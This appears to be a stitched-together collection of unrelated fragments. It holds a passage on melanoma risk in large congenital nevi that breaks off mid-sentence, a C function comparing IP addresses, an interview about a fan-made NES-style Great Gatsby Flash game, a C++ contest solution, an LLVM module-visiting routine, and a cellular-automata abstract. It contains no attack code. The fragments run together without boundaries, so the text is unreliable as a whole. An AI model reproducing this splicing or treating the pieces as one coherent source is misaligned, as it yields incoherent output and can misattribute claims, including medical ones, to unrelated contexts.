Malignant potential of large congenital nevi. THERE IS CLEAR DOCUMENTATION that large congenital nevi (giant pigmented nevus, melanocytic nevus) have a very high risk of becoming melanoma. The incidence of melanoma in large congenital nevi has been reported to be between 2 and 42 percent. The average incidence reported in the literature and in the experience at Stanford Hospital suggests that the incidence projected throughout a normal lifespan is between 10 and 20 percent. Therefore, we recommend that congenital melanocytic nevi be surgically excised and reconstructed by appropriate methods. The risk of developing a melanoma is present at all ages, although 70 percent of melanomas occur before puberty. Furthermore, there appears to be a close relationship between the histologic type of the giant nevus and the risk of malignancy. Giant nevi with a histologic pattern of a junctional nevus, neural nevus, or blue nevus seem to have a high risk, whereas a histologic pattern of an intradermal nevus has a lower risk. Therefore, screening biopsy specimens of the nevus may be helpful in determining the need for, and timing of, surgical excision. The reason for the high malignant potential is not known, but is probably due to one of two factors. First, the nevus is a hamartoma composed of melanocyte-like cells derived from the neural crest. It can be postulated that whatever teratogen caused the hamartoma has altered the genetic potential within the cell or is in itself also
//----------------------------------------------------------------------------
// Function: INET_CMP
//
// Comparison routine for IP addresses.
//
// Compares two IP addresses in network byte order by masking off and
// subtracting each pair of octets in turn, starting with the first octet
// of the dotted address; returns a negative, zero, or positive value,
// strcmp-style, from the first subtraction that differs.
//----------------------------------------------------------------------------

inline int
INET_CMP(DWORD a, DWORD b) {
    DWORD t;

    return ((t = ((a & 0x000000ff) - (b & 0x000000ff))) ? t :
           ((t = ((a & 0x0000ff00) - (b & 0x0000ff00))) ? t :
           ((t = ((a & 0x00ff0000) - (b & 0x00ff0000))) ? t :
           ((t = (((a>>8) & 0x00ff0000) - ((b>>8) & 0x00ff0000)))))));
}
The noticeably minimalist layout coupled with the sparse text of GreatGatsbyGame.com might stylistically conjure up Hemingway more than Fitzgerald, but it was on that unsuspecting website where The Great Gatsby video game revealed itself to the world. A Nintendo prototype cartridge of the game was allegedly found at a yard sale and purchased for the paltry sum of fifty cents. This game-pak contained an unreleased English localization of a Family Computer title called "Doki Doki Toshokan: Gatsby no Monogatari." To back up the bold claim, a blurry photo was taken of the cart, which showed a plain, white label with the word "GATSBY" and the date "12-6-90" written on the front. Accompanying this photograph was a convincing scan of an old magazine ad showcasing the never-before-seen game as well as a few pages out of the instruction manual. Before you flash those PayPal credit cards and shoot off the automated "Is the game for sale?" inquiries, my dear and anxious Nintendo collectors, the truth of the matter is the "old chaps" behind this site, Charlie Hoey and Pete Smith, are just having a little fun promoting their new Flash game — a game that just so happens to lovingly recreate one of the Great American Novels as if it were a long-lost, eight-bit Nintendo video game. Charlie and Pete were gracious enough to agree to an interview to further explain their ambitious project. What made you guys want to make a game based on The Great Gatsby in the first place, and why draw from the Nintendo Entertainment System for inspiration? Is there any meaning to be inferred from using 25-year-old technology to re-tell a story that's so interested in the cyclical nature of time? Charlie: Well, I think we both loved the aesthetics of old NES games so much, and so much of our childhood is sort of wrapped up in this way of telling stories. It's sort of like a scent memory or something, you know?
The aspect ratio and the color palette and the way sprites move and the glitches, it all comes together and really kinda feels like home, in a way. And I mean, The Great Gatsby is the best book ever, and when Pete and I started brainstorming about it, we came up with the TJ Eckleberg boss fight and it was just like, "Man, we have to do this." Pete: We do both really love old NES games and The Great Gatsby, but there might also have been kind of a gentle satirical thrust there—as the game industry has advanced, it's put a ton of focus on telling elaborate stories, when to me, there are media that are much better at storytelling, where games are really good at atmosphere, creating environments to explore, etc. So part of the joke was just how little sense The Great Gatsby makes as a NES game. Can you go a little bit into the development process? How long had The Great Gatsby been in the works? Charlie: Whew. 9 months to a year I'd say, with a lot of breaks in between. It's my first Flash project, so I had a TON of help from my good friend Dylan Valentine, who was on the project early on and got me up to speed. Then he got busy with real work so I sorta took over and got it done. At its best, the development process was me and Pete sitting at a table for like a whole weekend eating Doritos and drinking Mountain Dew and saying, "huh, what about a Gold Hat powerup?" and then making it happen. Pete: We were amazingly on the same page about so much stuff, and the stuff we disagreed on made for hilarious arguments. We were so committed to honoring both the book and the medium—goals that were often at cross-purposes—so we would argue about, like, whether the green light at the end of Level 4 should sparkle. (me: "no! gatsby is dead, the dream died with him!" charlie: "no NES game would end with a static image that way!"
[both storm off] [i came around on that one]) One thing that changed as we went along was that we actually reeled in a lot of our sillier ideas—we kept referring back to the text for details, and the prose is so beautiful that it didn't feel right to, say, have Nick battle a giant clam, which was our original concept for the last level. We kept trying to get more of the character of the book into the game, which is why Nick kind of has the hands-in-pockets slouch of an outside observer, whereas Gatsby stands ramrod straight—or why the background on the beach, as you travel from left to right, echoes one of the last lines of the novel: "And as the moon rose higher the inessential houses began to melt away until gradually I became aware of the old island here that flowered once for Dutch sailors' eyes—a fresh, green breast of the new world." Seeing those eight-bit flapper girls doing the Charleston is like something out of a dream. Could you talk about the making of the jazzy, upbeat soundtrack? Charlie: I'll let Pete speak to this, he did all of that. Pete: I write music for my band, The Aye-Ayes, but I didn't know a ton about '20s jazz. My guess is that a musicologist could point out a lot of musical anachronisms, but I did listen to a bunch of '20s jazz in preparation. The title screen music was inspired by this unbelievably gorgeous Billie Holiday song, "It's Like Reaching for the Moon"; I wrote it to fit the words of "Then Wear The Gold Hat," the poem Fitzgerald wrote for the title page of Gatsby and then attributed to the fictional poet Thomas Parke D'Invilliers. The music for Level 4, Nick's reverie on the beach, was supposed to sound like a Chopin nocturne—I'm not convinced I ever really nailed that. (You can hear a previous attempt at the Level 4 music in the cutscene of Gatsby standing on the cliff after Level 1—Charlie felt it was too upbeat for Level 4, and he was right.)
You nailed many elements of the novel, right down to Owl Eyes inspecting a book in Gatsby's library. Was there anything that you would have liked to have included but couldn't for whatever reason? Was there anything that you might have changed? Pete: I never liked those games that had too many gameplay styles mashed in at once, often in service to a story that was totally obscure anyway. They just tended to feel sloppy. I think the car level could've been funny but I'm glad we ended up telling that part of the story via a cutscene instead. I realize it would be impossible to translate Gatsby into a video game without booze. Fitzgerald's own wild lifestyle of attending parties, jumping in fountains, rolling bottles down the streets of New York, and then writing apologetic letters the next day for his behavior was all fueled by spirits. You do know, however, kind of like the Prohibition in the '20s, Nintendo wouldn't ever have allowed a game like this to be released due to its strict gaming policy forbidding alcohol from being shown. And religion? Forget about it, even if God is hidden metaphorically in the optician's eyes advertisement. Charlie: Yeah, I always love the story about Soda Popinski from the original Mike Tyson's Punch-out. You know in the arcade game he was "Vodka Drunkenski"? True story. Pete: I was thinking it would've been funny to mock up another manual page for "items" and label the martini power-up "Soda Pop." I noticed "S. Miyahon" was given a special thanks in the game's credits. This was the name that Shigeru Miyamoto was credited as in The Legend of Zelda. The story goes that Miyamoto named his masterpiece after F. Scott Fitzgerald's wife, Zelda. Are there any other in-game references or easter eggs to look out for? Pete: The "special thanks" section is full of the people who made our favorite NES games ever. And there are a couple secret endings—one that pays tribute to one of the most beautiful passages in the book, and one that... doesn't. 
Have you ever given any thought into converting the game into an actual working Nintendo cartridge to play on a real Nintendo Entertainment System? Charlie: The original idea, before we decided even we weren't that nerdy, was to make it an actual cartridge, maybe make 10 of them, and just hide them at flea markets and let the world discover them. I mean, if we'd done that, I don't think it would have gotten played as widely, but it would have been like, for the history books good. Ultimately we tried to strike the best compromise we could live with between accuracy and accessibility. Pete: I was still pulling out extra colors as of the night before launch. It still has way more colors in some places than a NES could handle, but we tried to keep it reasonably close—it bugs me when people make 8-bit style games and completely disregard what NES games actually looked like. I know that is almost unbelievably geeky (and also slightly hypocritical, since we weren't absolute purists about it ourselves). From The Great Gatsby Game's site: "For many reasons, some legal, we'd prefer not to profit from this game." Would you care to elaborate? Charlie: Well, The Great Gatsby is actually not public domain in the United States believe it or not, and I don't think it will be for like another decade, even though it already is in Canada and Australia. I think that this falls pretty squarely into the nebulous "fair use" category (according to my friend Molly Kleinman, "it's so transformative it makes my head hurt"). But, beyond that, we never really wanted to make money off it. Just to have this be picked up in the giant hydra of internet culture and catch on is... humbling. Priceless. Pete: I'd be pretty happy if people just donated to the two charities we listed. Kids need books. (And to a lesser extent, games.) [First Book; Child's Play] This game is fast going viral on the Internet. What do you make of the overwhelming response? 
What do you think attracts so many people to a Nintendo-inspired Great Gatsby game? Charlie: I had no idea if it would get picked up or not, I couldn't eat yesterday I was so nervous, and then it got tweeted by a few big places and traffic just went nuts. And the responses are so warm and positive, and these are like, nerds you know? They're not an easy crowd to please with an NES spin-off, and it's been really universally enjoyed and it just feels really great. I'm so glad people like it. Pete: I'm extremely touched and I get really excited when people notice the little things we worked hard to put in out of love for both the book and the genre. Are there any plans to adapt other classic literature in the future? Perhaps a puzzle game based on T.S. Eliot's "The Waste Land"? Or an RPG modeled after Joyce's Ulysses? Charlie: Ha! Yeah we talked about making a "Literary Classics Arcade" at first with 3 games, but I think you sort of have diminishing returns. But again, the code's up, it'd be so cool if other people picked up on it and kept the idea going. I mean, that's what the internet is all about, that's what makes it so beautiful. It's this big content snowball. Or, this is a gamer blog, let's say content katamari. Pete: I think we're pretty much done with this idea—but that said, I think someone could make a hilarious Oregon Trail type game built off of Faulkner's As I Lay Dying, one of my all-time favorites. If people want to pick up the ball and run with it, I'd also love to see this game as an actual NES rom—though, again, you'd probably have to scale the graphics back considerably in some places. When you aren't making fantastic Fitzgerald Flash games, what do you guys do for a living? Charlie: I'm a developer at The Barbarian Group in San Francisco. Just moved out here from Philly in November. Pete: I'm an editor at Nerve.com, a website about sex, relationships, and pop culture that everyone should read. Anything else you'd like to add?
Charlie: Just thank you internet. It's really an honor to have so many people enjoying something you made. Pete: Thanks, everyone! One can only hope that, if it isn't Charlie or Pete, somebody else returns to that blessed yard sale sometime soon and digs even deeper to unearth more digitized literary treasure. Until then, we play on, beating our high scores, borne back ceaselessly into gaming's past. -Mike
#include <bits/stdc++.h>
#define maxn 501
#define mod 1000009
#define infinite 100000000
#define FOR(i, j, k, in) for (int i = j; i < k; i += in)
#define REP(i, j) FOR(i, 0, j, 1)
using namespace std;
typedef unsigned long long int ull;
typedef long long int ll;
typedef double db;
typedef long double ldb;
typedef pair<int, int> ii;
typedef pair<ll, int> li;
typedef pair<db, db> dd;
typedef vector<int> vi;
typedef vector< vector<int> > vvi;
typedef vector<pair<int, int>> vii;
#define mp make_pair
#define Fi first
#define Se second
#define pb(x) push_back(x)
#define szz(x) ((int)(x).size())
#define all(x) (x).begin(), (x).end()

int main() {
    ll n, cost;
    cin >> n;
    vector<ll> cei(n, 0), sumi(n, 0);
    REP(i, n) {
        cin >> cei[i] >> sumi[i];
    }
    REP(i, n) {
        cost = 0;
        ll secciones;  // was int: the squares below could overflow 32 bits
        if (sumi[i] <= cei[i]) {
            cout << sumi[i] << endl;
        } else {
            secciones = sumi[i] / cei[i];
            if (sumi[i] % cei[i] == 0) {
                cout << (secciones * secciones) * cei[i] << endl;
            } else {
                ll resto = sumi[i] % cei[i];  // was int, for the same reason
                REP(j, resto) {
                    cost += (secciones + 1) * (secciones + 1);
                }
                REP(j, cei[i] - resto) {
                    cost += secciones * secciones;
                }
                cout << cost << endl;
            }
        }
    }
}
/// \brief Perform a depth-first visit of the current module. static bool visitDepthFirst(ModuleFile &M, bool (*Visitor)(ModuleFile &M, bool Preorder, void *UserData), void *UserData, llvm::SmallPtrSet<ModuleFile *, 4> &Visited) { if (Visitor(M, true, UserData)) return true; for (llvm::SetVector<ModuleFile *>::iterator IM = M.Imports.begin(), IMEnd = M.Imports.end(); IM != IMEnd; ++IM) { if (!Visited.insert(*IM)) continue; if (visitDepthFirst(**IM, Visitor, UserData, Visited)) return true; } return Visitor(M, false, UserData); }
Expansive invertible onesided cellular automata We study expansive invertible onesided cellular automata (i.e., expansive automorphisms of onesided full shifts) and find severe dynamical and arithmetic constraints which provide partial answers to questions raised by M. Nasu. We employ the images and bilateral dimension groups, measure multipliers, and constructive combinatorial characterizations for two classes of cellular automata.
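For readers outside symbolic dynamics, the expansiveness condition being invoked can be sketched as follows (standard notation, not taken from the abstract; here $f$ is an invertible cellular automaton acting on the full shift $X = A^{\mathbb{N}}$ equipped with a compatible metric $d$):

```latex
% f is expansive with expansive constant c > 0 if every pair of
% distinct points is separated by at least c under some iterate:
\[
  \exists\, c > 0 \;\;\forall\, x \neq y \in X \;\;\exists\, n \in \mathbb{Z} :
  \quad d\bigl(f^{n}(x),\, f^{n}(y)\bigr) > c .
\]
```

Informally: no two distinct configurations can shadow each other forever; their orbits must eventually diverge by a uniform amount, which is the source of the strong constraints the abstract refers to.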